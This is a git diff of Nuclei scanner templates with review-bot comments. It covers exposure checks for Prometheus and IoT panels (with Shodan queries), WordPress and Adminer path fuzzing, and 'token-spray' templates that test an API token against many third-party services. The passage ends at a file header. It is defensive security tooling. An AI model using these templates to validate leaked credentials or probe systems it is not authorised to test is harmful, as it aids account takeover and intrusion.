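Review bot: The `web_admin_enabled` extractor's regex over-escapes characters that are not special in single-quoted YAML or in RE2 (`\-`, `\:`, `\"`), which makes it hard to read; `'"web\.enable-admin-api": "true"'` is equivalent and clearer. Since an enabled admin API is what turns this from an information leak into something actionable, a short comment above the extractor, `# surfaces whether the admin API (snapshot/delete endpoints) is on`, would tell the operator why that field is reported; hedged, as the reference article rather than this hunk establishes what the admin API exposes.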
diff --git a/exposures/configs/prometheus-targets-endpoint.yaml b/exposures/configs/prometheus-targets-endpoint.yaml
new file mode 100644
index 0000000000..cd326bed1c
--- /dev/null
+++ b/exposures/configs/prometheus-targets-endpoint.yaml
@@ -0,0 +1,31 @@
+id: prometheus-targets-endpoint
+
+info:
+ name: Prometheus targets API endpoint
+ author: geeknik
+ severity: info
+ description: The targets endpoint exposes services belonging to the infrastructure, including their roles and labels. In addition to showing the target machine addresses, the endpoint also exposes metadata labels that are added by the target provider. These labels are intended to contain non-sensitive values, like the name of the server or its description, but various cloud platforms may automatically expose sensitive data in these labels, oftentimes without the developer’s knowledge.
+ reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/
+ tags: prometheus,exposure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/api/v1/targets"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - '{"status":"success","data":'
+ - 'Labels'
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - 'application/json'
diff --git a/exposures/files/sensitive-storage-exposure.yaml b/exposures/files/sensitive-storage-exposure.yaml
index 5db4e2330b..a65916dea3 100644
--- a/exposures/files/sensitive-storage-exposure.yaml
+++ b/exposures/files/sensitive-storage-exposure.yaml
@@ -15,6 +15,7 @@ requests:
- "{{BaseURL}}/server/storage/"
- "{{BaseURL}}/intikal/storage/"
- "{{BaseURL}}/elocker_old/storage/"
+ stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
diff --git a/fuzzing/adminer-panel-fuzz.yaml b/fuzzing/adminer-panel-fuzz.yaml
index ad8ba27848..0676457b68 100644
--- a/fuzzing/adminer-panel-fuzz.yaml
+++ b/fuzzing/adminer-panel-fuzz.yaml
@@ -23,17 +23,17 @@ requests:
payloads:
path: helpers/wordlists/adminer-paths.txt
- attack: sniper
threads: 50
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
+ condition: and
words:
- "- Adminer"
- - "partial(verifyVersion, "
- condition: and
+ - "partial(verifyVersion"
+
- type: status
status:
- 200
diff --git a/fuzzing/mdb-database-file.yaml b/fuzzing/mdb-database-file.yaml
index 2fe78b348f..4eab49564e 100644
--- a/fuzzing/mdb-database-file.yaml
+++ b/fuzzing/mdb-database-file.yaml
@@ -14,12 +14,10 @@ requests:
Host: {{Hostname}}
Origin: {{BaseURL}}
Accept-Language: en-US,en;q=0.9
- Connection: close
payloads:
mdbPaths: helpers/wordlists/mdb-paths.txt
- attack: sniper
threads: 50
max-size: 500 # Size in bytes - Max Size to read from server response
stop-at-first-match: true
diff --git a/fuzzing/prestashop-module-fuzz.yaml b/fuzzing/prestashop-module-fuzz.yaml
index 63fd397d99..11072add7c 100644
--- a/fuzzing/prestashop-module-fuzz.yaml
+++ b/fuzzing/prestashop-module-fuzz.yaml
@@ -1,4 +1,5 @@
id: prestashop-module-fuzz
+
info:
name: Prestashop Modules Enumeration
author: meme-lord
@@ -16,19 +17,18 @@ requests:
payloads:
path: helpers/wordlists/prestashop-modules.txt
- attack: sniper
- threads: 50
+ threads: 50
matchers-condition: and
matchers:
- type: word
+ condition: and
words:
- ""
- ""
- ""
- ""
- ""
- condition: and
- type: status
status:
diff --git a/fuzzing/wordpress-plugins-detect.yaml b/fuzzing/wordpress-plugins-detect.yaml
index 1af3f07971..c9f21082e4 100644
--- a/fuzzing/wordpress-plugins-detect.yaml
+++ b/fuzzing/wordpress-plugins-detect.yaml
@@ -1,4 +1,5 @@
id: wordpress-plugins-detect
+
info:
name: WordPress Plugins Detection
author: 0xcrypto
@@ -13,11 +14,8 @@ requests:
payloads:
pluginSlug: helpers/wordlists/wordpress-plugins.txt
- attack: sniper
- threads: 50
- redirects: true
- max-redirects: 1
+ threads: 50
matchers-condition: and
matchers:
- type: status
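Review bot: Removing `redirects: true` and `max-redirects: 1` changes behaviour, not just layout: a plugin directory that answers with a 301 to its slash-terminated form will no longer be followed, and if the status matcher that starts at the bottom of this hunk (its values are cut off here) requires 200, previously detected plugins are now missed. Either keep the two redirect options or accept the redirect status in the matcher; the path line that would confirm whether a trailing slash is already sent is above the hunk.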
diff --git a/fuzzing/wordpress-themes-detect.yaml b/fuzzing/wordpress-themes-detect.yaml
index 9343703599..dd98af2fe3 100644
--- a/fuzzing/wordpress-themes-detect.yaml
+++ b/fuzzing/wordpress-themes-detect.yaml
@@ -1,4 +1,5 @@
id: wordpress-themes-detect
+
info:
name: WordPress Theme Detection
author: 0xcrypto
@@ -13,11 +14,8 @@ requests:
payloads:
themeSlug: helpers/wordlists/wordpress-themes.txt
- attack: sniper
- threads: 50
- redirects: true
- max-redirects: 1
+ threads: 50
matchers-condition: and
matchers:
- type: status
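Review bot: Same concern as the plugins template: dropping `redirects: true` / `max-redirects: 1` means a 301 to the slash-terminated theme directory is no longer followed, so a status matcher requiring 200 (its values are cut off at the bottom of this hunk) would miss themes it found before. Keep the redirect options or add the redirect status to the matcher, whichever matches the intent of the commit.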
diff --git a/iot/codian-mcu-login.yaml b/iot/codian-mcu-login.yaml
new file mode 100644
index 0000000000..56f05a6e19
--- /dev/null
+++ b/iot/codian-mcu-login.yaml
@@ -0,0 +1,24 @@
+id: codian-mcu-login
+
+info:
+ name: Codian MCU Login
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/7404
+ tags: iot
+ metadata:
+ shodan: 'http.title:"Codian MCU - Home page"'
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/login.html'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Codian MCU - login:'
+ - type: status
+ status:
+ - 200
diff --git a/iot/envision-gateway.yaml b/iot/envision-gateway.yaml
new file mode 100644
index 0000000000..fb1440730d
--- /dev/null
+++ b/iot/envision-gateway.yaml
@@ -0,0 +1,24 @@
+id: envision-gateway
+
+info:
+ name: EnvisionGateway
+ author: dhiyaneshDK
+ severity: low
+ reference: https://www.exploit-db.com/ghdb/7315
+ tags: iot
+ metadata:
+ shodan: 'http.title:"EnvisionGateway"'
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/#'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'EnvisionGateway'
+ - type: status
+ status:
+ - 200
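Review bot: The path `{{BaseURL}}/#` includes a fragment, which the client never sends, so the request is just `/`; write `- '{{BaseURL}}/'` to make that explicit. `severity: low` also stands out against the other new IoT/panel detections in this commit, which are all `info` with the same shape (title match plus 200); unless the `reference` documents an actual weakness in the exposed gateway, `info` is the consistent choice.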
diff --git a/iot/heatmiser-wifi-thermostat.yaml b/iot/heatmiser-wifi-thermostat.yaml
new file mode 100644
index 0000000000..3426a7ebf4
--- /dev/null
+++ b/iot/heatmiser-wifi-thermostat.yaml
@@ -0,0 +1,24 @@
+id: heatmiser-wifi-thermostat
+
+info:
+ name: Heatmiser Wifi Thermostat
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/7445
+ tags: iot
+ metadata:
+ shodan: 'http.title:"Heatmiser Wifi Thermostat"'
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/index.htm'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Heatmiser Wifi Thermostat'
+ - type: status
+ status:
+ - 200
diff --git a/iot/webcamxp-5.yaml b/iot/webcamxp-5.yaml
new file mode 100644
index 0000000000..8b63f6cc6e
--- /dev/null
+++ b/iot/webcamxp-5.yaml
@@ -0,0 +1,24 @@
+id: webcamxp-5
+
+info:
+ name: webcamXP 5
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/7448
+ tags: iot
+ metadata:
+ shodan: 'http.title:"webcamXP 5"'
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/home.html'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'webcamXP 5'
+ - type: status
+ status:
+ - 200
diff --git a/miscellaneous/ntlm-directories.yaml b/miscellaneous/ntlm-directories.yaml
index 1733d4647d..a36f3f1287 100644
--- a/miscellaneous/ntlm-directories.yaml
+++ b/miscellaneous/ntlm-directories.yaml
@@ -14,6 +14,7 @@ requests:
Host: {{Hostname}}
Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
+ threads: 50
payloads:
path:
- /
@@ -63,9 +64,6 @@ requests:
- /webticket/webticketservice.svcabs/
- /adfs/services/trust/2005/windowstransport
- attack: sniper
- threads: 50
-
matchers-condition: and
matchers:
- type: dsl
diff --git a/misconfiguration/zenphoto-sensitive-info.yaml b/misconfiguration/zenphoto-sensitive-info.yaml
index 5f9225ea95..b3ba0c441a 100644
--- a/misconfiguration/zenphoto-sensitive-info.yaml
+++ b/misconfiguration/zenphoto-sensitive-info.yaml
@@ -16,6 +16,7 @@ requests:
- '{{BaseURL}}/gallery/zp-core/setup/index.php'
- '{{BaseURL}}/zp-core/setup/index.php'
+ stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
diff --git a/network/detect-jabber-xmpp.yaml b/network/detect-jabber-xmpp.yaml
new file mode 100644
index 0000000000..7dbfdd8e64
--- /dev/null
+++ b/network/detect-jabber-xmpp.yaml
@@ -0,0 +1,24 @@
+id: detect-jabber-xmpp
+
+info:
+ name: Detects Jabber XMPP Instance
+ author: geeknik
+ severity: info
+ description: Jabber is the original name of the Extensible Messaging and Presence Protocol (XMPP), the open technology for instant messaging and presence.
+ reference: https://datatracker.ietf.org/doc/html/rfc6120
+ tags: network,jabber,xmpp
+
+network:
+ - inputs:
+ - data: "a\n"
+
+ host:
+ - "{{Hostname}}"
+ - "{{Hostname}}:5222"
+
+ matchers:
+ - type: word
+ words:
+ - "stream:stream xmlns:stream"
+ - "stream:error xmlns:stream"
+ condition: or
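Review bot: The `description:` under `info:` is a single plain scalar well over 120 characters; folding it as `description: >-` with the sentence wrapped beneath keeps the line short without changing the value. The probe sends `"a\n"` and matches either the stream header or a `stream:error`, which the two `words:` encode but nothing explains; a comment above `inputs:` such as `# non-XML probe: the server answers with a stream header or a stream:error, either is a match` would spare the next reader working that out.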
diff --git a/technologies/aviatrix-detect.yaml b/technologies/aviatrix-detect.yaml
index 343b261d8b..64be83fd08 100644
--- a/technologies/aviatrix-detect.yaml
+++ b/technologies/aviatrix-detect.yaml
@@ -5,6 +5,8 @@ info:
author: pikpikcu,philippedelteil
severity: info
tags: tech,aviatrix
+ metadata:
+ shodan-query: http.title:"AviatrixController", http.title:"Aviatrix Cloud Controller"
requests:
- method: GET
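Review bot: `shodan-query:` packs two queries into one plain scalar separated by `, `, so any consumer reading the field gets the single string `http.title:"AviatrixController", http.title:"Aviatrix Cloud Controller"` rather than two queries. A YAML sequence keeps them apart: `shodan-query:` followed by `- 'http.title:"AviatrixController"'` and `- 'http.title:"Aviatrix Cloud Controller"'`; if the consumer does require one string, at least quote the scalar so the embedded double quotes and comma are unambiguous. The four new iot templates in this commit spell the same key `shodan:`; one spelling should win.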
diff --git a/technologies/aws/aws-bucket-service.yaml b/technologies/aws/aws-bucket-service.yaml
index ad824b8670..f2d61d54f4 100644
--- a/technologies/aws/aws-bucket-service.yaml
+++ b/technologies/aws/aws-bucket-service.yaml
@@ -18,7 +18,7 @@ requests:
- contains(tolower(all_headers), 'x-amz-bucket')
- contains(tolower(all_headers), 'x-amz-request')
- contains(tolower(all_headers), 'x-amz-id')
- - contains(tolower(all_headers), 'AmazonS3')
+ - contains(tolower(all_headers), 'amazons3')
part: header
condition: or
diff --git a/token-spray/README.md b/token-spray/README.md
index 24081b4662..4c463e5694 100644
--- a/token-spray/README.md
+++ b/token-spray/README.md
@@ -1,15 +1,19 @@
## About
+
This directory holds templates that have static API URL endpoints. Use these to test an API token against many API service endpoints. By providing token input using flag, Nuclei will test the token against all known API endpoints within the API templates, and return any successful results. By incorporating API checks as Nuclei Templates, users can test API keys that have no context (i.e., API keys that do not indicate for which API endpoint they are meant).
## Usage
-You do not need to specify an input URL to test a token against these API endpoints, as the API endpoints have static URLs. However, Nuclei requires an input (specified via `-u` for individual URLs or `-l` for a file containing URLs). Because of this requirement, we simply pass in `-u "null"`. Each template in the `token-spray` directory assumes the input API token will be provided using CLI `var` flag.
-```bash
-# Run Nuclei specifying all the api templates:
+token-spray are **self-contained** template and does not requires URLs as input as the API endpoints have static URLs predefined in the template. Each template in the `token-spray` directory assumes the input API token/s will be provided using CLI `var` flag.
-nuclei -u null -t token-spray/ -var token=thisIsMySecretTokenThatIWantToTest
+```console
+# Running token-spray templates against a single token to test
+nuclei -t token-spray/ -var token=random-token-to-test
+
+# Running token-spray templates against a file containing multiple new line delimited tokens
+nuclei -t token-spray/ -var token=file_with_tokens.txt
```
## Credits
-These API testing templates were inspired by the [streaak/keyhacks](https://github.com/streaak/keyhacks) repository. The Bishop Fox [Continuous Attack Surface Testing (CAST)](https://www.bishopfox.com/continuous-attack-surface-testing/how-cast-works/) team created additional API templates for testing API keys uncovered during investigations. You are welcome to add new templates based on the existing format to cover more APIs.
+These API testing templates were inspired by the [streaak/keyhacks](https://github.com/streaak/keyhacks) repository. The Bishop Fox [Continuous Attack Surface Testing (CAST)](https://www.bishopfox.com/continuous-attack-surface-testing/how-cast-works/) team created additional API templates for testing API keys uncovered during investigations. You are welcome to add new templates based on the existing format to cover more APIs.
\ No newline at end of file
diff --git a/token-spray/asana.yaml b/token-spray/asana.yaml
index 9282cf7a4d..482dc7bdd9 100644
--- a/token-spray/asana.yaml
+++ b/token-spray/asana.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,asana
+self-contained: true
requests:
- method: GET
path:
@@ -16,6 +17,6 @@ requests:
matchers:
- type: status
+ negative: true
status:
- 401
- negative: true
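Review bot: The only matcher is `negative: true` on status `401`, so every non-401 answer — `403`, a `429` rate limit, a `5xx`, or a proxy error page — is reported as a working token. A positive match on the status the endpoint returns for a valid token (for example `status:` / `- 200`) alongside or instead of the negation keeps the check honest. The same pattern recurs in google-geolocation (negated `404` and body `error`) and googlet-extsearchplaces (negated body `error_message`), where a generic error page that lacks the string also passes.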
diff --git a/token-spray/bingmaps.yaml b/token-spray/bingmaps.yaml
index 0892d85b9f..17c0d216aa 100644
--- a/token-spray/bingmaps.yaml
+++ b/token-spray/bingmaps.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,bing,maps,bingmaps
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/bitly.yaml b/token-spray/bitly.yaml
index 57e1d5d3d4..01c70c7974 100644
--- a/token-spray/bitly.yaml
+++ b/token-spray/bitly.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,bitly
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/buildkite.yaml b/token-spray/buildkite.yaml
index 77e8e1e677..350b8edd1b 100644
--- a/token-spray/buildkite.yaml
+++ b/token-spray/buildkite.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,buildkite
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/buttercms.yaml b/token-spray/buttercms.yaml
index 229da7b1d5..15d86d53fe 100644
--- a/token-spray/buttercms.yaml
+++ b/token-spray/buttercms.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,buttercms
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/calendly.yaml b/token-spray/calendly.yaml
index 1d8289fb37..b54a5c8df8 100644
--- a/token-spray/calendly.yaml
+++ b/token-spray/calendly.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,calendly
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/circleci.yaml b/token-spray/circleci.yaml
index 281d22b656..d519f10651 100644
--- a/token-spray/circleci.yaml
+++ b/token-spray/circleci.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,circle,circleci
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/deviantart.yaml b/token-spray/deviantart.yaml
index 403b97a349..ab73e7ea0d 100644
--- a/token-spray/deviantart.yaml
+++ b/token-spray/deviantart.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,deviantart
+self-contained: true
requests:
- method: POST
path:
diff --git a/token-spray/dropbox.yaml b/token-spray/dropbox.yaml
index 29679e2b2f..339837160e 100644
--- a/token-spray/dropbox.yaml
+++ b/token-spray/dropbox.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,dropbox
+self-contained: true
requests:
- method: POST
path:
diff --git a/token-spray/github.yaml b/token-spray/github.yaml
index c6d1d560de..4722dfe6d3 100644
--- a/token-spray/github.yaml
+++ b/token-spray/github.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,github
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-autocomplete.yaml b/token-spray/google-autocomplete.yaml
index b3c459082e..ae81be1c96 100644
--- a/token-spray/google-autocomplete.yaml
+++ b/token-spray/google-autocomplete.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,autocomplete
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-customsearch.yaml b/token-spray/google-customsearch.yaml
index 0be1636139..61af504633 100644
--- a/token-spray/google-customsearch.yaml
+++ b/token-spray/google-customsearch.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,search
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-directions.yaml b/token-spray/google-directions.yaml
index a6b8cea46b..97aaf95d6c 100644
--- a/token-spray/google-directions.yaml
+++ b/token-spray/google-directions.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,directions
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-elevation.yaml b/token-spray/google-elevation.yaml
index 480bc31fb7..31b68e98de 100644
--- a/token-spray/google-elevation.yaml
+++ b/token-spray/google-elevation.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,elevation
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-fcm.yaml b/token-spray/google-fcm.yaml
index aba6f43579..8ca7a1653f 100644
--- a/token-spray/google-fcm.yaml
+++ b/token-spray/google-fcm.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,fcm,firebase,cloud,messaging
+self-contained: true
requests:
- method: POST
path:
diff --git a/token-spray/google-findplacefromtext.yaml b/token-spray/google-findplacefromtext.yaml
index dcecba34b2..1fe4c209e8 100644
--- a/token-spray/google-findplacefromtext.yaml
+++ b/token-spray/google-findplacefromtext.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,find,text
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-gedistancematrix.yaml b/token-spray/google-gedistancematrix.yaml
index 62795ea15e..42987ebfe1 100644
--- a/token-spray/google-gedistancematrix.yaml
+++ b/token-spray/google-gedistancematrix.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,distance,matrix
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-geocode.yaml b/token-spray/google-geocode.yaml
index 91826af391..dbba7431d5 100644
--- a/token-spray/google-geocode.yaml
+++ b/token-spray/google-geocode.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,geocode
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-geolocation.yaml b/token-spray/google-geolocation.yaml
index 88d1ce9ffc..a322b89967 100644
--- a/token-spray/google-geolocation.yaml
+++ b/token-spray/google-geolocation.yaml
@@ -6,19 +6,21 @@ info:
severity: info
tags: token-spray,google,geolocation
+self-contained: true
requests:
- method: GET
path:
- "https://www.googleapis.com/geolocation/v1/geolocate?key={{token}}"
- matchers-condition: and
+ matchers-condition: and
matchers:
- type: word
part: body
+ negative: true
words:
- 'error'
- negative: true
+
- type: status
+ negative: true
status:
- 404
- negative: true
diff --git a/token-spray/google-mapsembed.yaml b/token-spray/google-mapsembed.yaml
index d7b47585f1..f8689ae282 100644
--- a/token-spray/google-mapsembed.yaml
+++ b/token-spray/google-mapsembed.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,maps,embed
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-mapsembedadvanced.yaml b/token-spray/google-mapsembedadvanced.yaml
index 5f8e4d2721..171ff4b005 100644
--- a/token-spray/google-mapsembedadvanced.yaml
+++ b/token-spray/google-mapsembedadvanced.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,maps,embed
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-nearbysearch.yaml b/token-spray/google-nearbysearch.yaml
index 752d9d9814..db0dda7fab 100644
--- a/token-spray/google-nearbysearch.yaml
+++ b/token-spray/google-nearbysearch.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,search,nearby
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-nearestroads.yaml b/token-spray/google-nearestroads.yaml
index e804422ff0..9551876122 100644
--- a/token-spray/google-nearestroads.yaml
+++ b/token-spray/google-nearestroads.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,roads
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-placedetails.yaml b/token-spray/google-placedetails.yaml
index 30ca3e6184..2f6cf7d464 100644
--- a/token-spray/google-placedetails.yaml
+++ b/token-spray/google-placedetails.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,place,details
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-placesphoto.yaml b/token-spray/google-placesphoto.yaml
index 82f33c2e1d..6b6b3cd539 100644
--- a/token-spray/google-placesphoto.yaml
+++ b/token-spray/google-placesphoto.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,places,photo
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-playablelocations.yaml b/token-spray/google-playablelocations.yaml
index 2e38d6316a..6dce339499 100644
--- a/token-spray/google-playablelocations.yaml
+++ b/token-spray/google-playablelocations.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,playable,locations
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-routetotraveled.yaml b/token-spray/google-routetotraveled.yaml
index c97cfcee59..2c0853eda0 100644
--- a/token-spray/google-routetotraveled.yaml
+++ b/token-spray/google-routetotraveled.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,route
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-speedlimit.yaml b/token-spray/google-speedlimit.yaml
index 5eec3d0a53..e5e8290a6a 100644
--- a/token-spray/google-speedlimit.yaml
+++ b/token-spray/google-speedlimit.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,speed,limit
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-staticmaps.yaml b/token-spray/google-staticmaps.yaml
index d4a012bff2..ba4ee679ca 100644
--- a/token-spray/google-staticmaps.yaml
+++ b/token-spray/google-staticmaps.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,maps
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-streetview.yaml b/token-spray/google-streetview.yaml
index 49d043391d..d7156a7295 100644
--- a/token-spray/google-streetview.yaml
+++ b/token-spray/google-streetview.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,streetview
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-timezone.yaml b/token-spray/google-timezone.yaml
index 273101bcc9..40b13b61ca 100644
--- a/token-spray/google-timezone.yaml
+++ b/token-spray/google-timezone.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,timezone
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/googlet-extsearchplaces.yaml b/token-spray/googlet-extsearchplaces.yaml
index c3683703cf..290da60328 100644
--- a/token-spray/googlet-extsearchplaces.yaml
+++ b/token-spray/googlet-extsearchplaces.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,search,places,text
+self-contained: true
requests:
- method: GET
path:
@@ -14,6 +15,6 @@ requests:
matchers:
- type: word
part: body
+ negative: true
words:
- 'error_message'
- negative: true
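Review bot: The file name `googlet-extsearchplaces.yaml` looks like a transposition of `google-textsearchplaces.yaml`; the tags line `token-spray,google,search,places,text` points at Google Places Text Search, and every sibling in the directory is prefixed `google-`. Renaming keeps the directory listing and tag-based selection consistent; the template `id`, which sits outside this hunk, should be checked for the same typo.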
diff --git a/token-spray/heroku.yaml b/token-spray/heroku.yaml
index 9f08e416d5..ef81ec91e8 100644
--- a/token-spray/heroku.yaml
+++ b/token-spray/heroku.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,heroku
+self-contained: true
requests:
- method: POST
path:
@@ -17,9 +18,9 @@ requests:
matchers:
- type: status
+ condition: or
status:
- 200
- 201
- 202
- 206
- condition: or
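Review bot: `condition: or` on a `status` matcher is a no-op as far as I can tell — nuclei treats a list of status codes as any-of and does not support an AND condition for them — so moving the line only relocates a key that documents nothing. Dropping it leaves `status:` with the four codes and identical behaviour; if the intent was to spell out the any-of semantics, a `# any one of these codes counts as accepted` comment says so without implying a switch exists.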
diff --git a/token-spray/hubspot.yaml b/token-spray/hubspot.yaml
index 86566864f0..da95a4b12a 100644
--- a/token-spray/hubspot.yaml
+++ b/token-spray/hubspot.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,hubspot
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/instagram.yaml b/token-spray/instagram.yaml
index 289546f452..dd851bee3e 100644
--- a/token-spray/instagram.yaml
+++ b/token-spray/instagram.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,instagram,graph
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/ipstack.yaml b/token-spray/ipstack.yaml
index f64daea02e..ac527d2a1e 100644
--- a/token-spray/ipstack.yaml
+++ b/token-spray/ipstack.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,ipstack
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/iterable.yaml b/token-spray/iterable.yaml
index 0c1f84d566..69da55de5d 100644
--- a/token-spray/iterable.yaml
+++ b/token-spray/iterable.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,iterable
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/jumpcloud.yaml b/token-spray/jumpcloud.yaml
index a885c5c780..dbf3c9ab35 100644
--- a/token-spray/jumpcloud.yaml
+++ b/token-spray/jumpcloud.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,jumpcloud
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/lokalise.yaml b/token-spray/lokalise.yaml
index 0c937b51fa..5003f25b31 100644
--- a/token-spray/lokalise.yaml
+++ b/token-spray/lokalise.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,lokalise
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/loqate.yaml b/token-spray/loqate.yaml
index d0ed434602..dcbf5b156d 100644
--- a/token-spray/loqate.yaml
+++ b/token-spray/loqate.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,loqate
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/mailchimp.yaml b/token-spray/mailchimp.yaml
index 9d7073e46c..d25870e279 100644
--- a/token-spray/mailchimp.yaml
+++ b/token-spray/mailchimp.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,mailchimp
+self-contained: true
network:
- inputs:
- data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n"
diff --git a/token-spray/mailgun.yaml b/token-spray/mailgun.yaml
index 3667ba1c69..c4997aaaa4 100644
--- a/token-spray/mailgun.yaml
+++ b/token-spray/mailgun.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,mailgun
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/mapbox.yaml b/token-spray/mapbox.yaml
index c4640d9695..1e246f783b 100644
--- a/token-spray/mapbox.yaml
+++ b/token-spray/mapbox.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,mapbox
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/nerdgraph.yaml b/token-spray/nerdgraph.yaml
index d67d458faa..ca570964e4 100644
--- a/token-spray/nerdgraph.yaml
+++ b/token-spray/nerdgraph.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,newrelic,nerdgraph
+self-contained: true
requests:
- method: POST
path:
diff --git a/token-spray/npm.yaml b/token-spray/npm.yaml
index cfe2c86746..fb0ef0b6b7 100644
--- a/token-spray/npm.yaml
+++ b/token-spray/npm.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,node,npm,package,manager
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/openweather.yaml b/token-spray/openweather.yaml
index 1a9a5058e3..916936aa97 100644
--- a/token-spray/openweather.yaml
+++ b/token-spray/openweather.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,weather,openweather
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/pagerduty.yaml b/token-spray/pagerduty.yaml
index fcc00d7e88..bad59948ed 100644
